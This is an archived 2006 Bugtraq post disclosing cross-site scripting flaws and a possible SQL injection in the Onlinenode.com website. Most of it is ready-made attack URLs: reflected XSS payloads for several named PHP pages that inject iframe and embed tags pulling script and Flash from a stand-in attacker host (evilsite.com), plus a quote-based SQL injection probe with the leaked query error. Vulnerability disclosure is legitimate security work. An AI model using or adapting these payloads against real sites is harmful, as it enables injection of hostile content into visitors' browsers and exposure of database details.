lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060611001154.8894.qmail@securityfocus.com>
Date: 11 Jun 2006 00:11:54 -0000
From: luny@...fucktard.com
To: bugtraq@...urityfocus.com
Subject: Onlinenode.com - XSS


Onlinenode.com

Homepage:
http://www.onlinenode.com

Effected files:
node_category.php
node_article.php
webpage.php
guestbook.php
journal.php
pictures.php
chatroom.php

---------------------------

XSS Vuln via node_category.php:

One way to archive this is to use black tags with an open ended iframe tag:
http://www.onlinenode.com/node_category.php?forms_action=node_category&forms_id_category=1">'>"<iframe%20src=http://evilsite.com/scriptlet.html%20<

Another way would be to use <embed> tags, since using flash could also create a XSS attack:

http://www.onlinenode.com/node_category.php?forms_action=node_category&forms_id_category=1''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">

--------------------------------------------

XSS Vuln via node_article.php:

One way to archive this is to use black tags with an open ended iframe tag:

http://www.onlinenode.com/node_article.php?forms_action=node_article&forms_id_article=158391149699301''"<"'><iframe%20src=http://evilsite.com/scriptlet.html%20<


Another way would be to use <embed> tags, since using flash could also create a XSS attack:

http://www.onlinenode.com/node_article.php?forms_action=node_article&forms_id_article=158391149699301''"<"'><EMBED%20src=http://www.evilsite.com/badflash.swf></embed><'<"">

-------------------------------------------

Possible SQL injection due to with query error:

http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user=19'

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use 

near '127.0.0.1' AND host != 'adsl-127-0-0.lol.somehost.com'' >>> UPDATE counter SET ip = '127.0.0.1',host = 'adsl-127-0-0.lol.

somehost.com',count = count + 1 WHERE id_user = '19'' AND ip != '127.0.0.1' AND host != 'dsl-127-0-0.lol.somehost.com'

We can see from the above query, a few table names as well as our IP + hostmask.


XSS Vuln in webpage.php:

http://www.onlinenode.com/webpage.php?forms_action=webpage&forms_id_user=2">'><iframe%20src=http://evilsite.com/scriptlet.html <

Again, same as above the <embed> tags also work for flash.
------------------------------------------

XSS Vulnerability via guestbook.php:

http://www.onlinenode.com/guestbook.php?forms_action=guestbook1&forms_id_user=18">'><iframe%20src=http://evilsite.com/scriptlet.html%20<

Again, same as above the <embed> tags also work for flash.

-----------------------------------------

XSS Vulnerability via journal.php:
http://www.onlinenode.com/journal.php?forms_action=journal&forms_id_user=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<

Again, same as above the <embed> tags also work for flash.

---------------------------------------
XSS Vuln via pictures.php:

http://www.onlinenode.com/pictures.php?forms_action=pictures&forms_id_user=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<

Again, same as above the <embed> tags also work for flash.

----------------------------------------

XSS Vuln via mb_thread.php when viewing threads:

http://www.onlinenode.com/mb_thread.php?forms_action=mb_thread1&forms_id_thread=0">'><iframe%20src=http://evilsite.com/scriptlet.html%20<

Again, same as above the <embed> tags also work for flash.

-------------------------------------
XSS Vuln via chatroom.php:

http://www.onlinenode.com/chatroom.php?forms_action=chatroom_main&forms_room=">'><iframe%20src=http://evilsite.com/scriptlet.html%20<&button.x=24&button.y=14

Again, <embed> tags work here too.


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ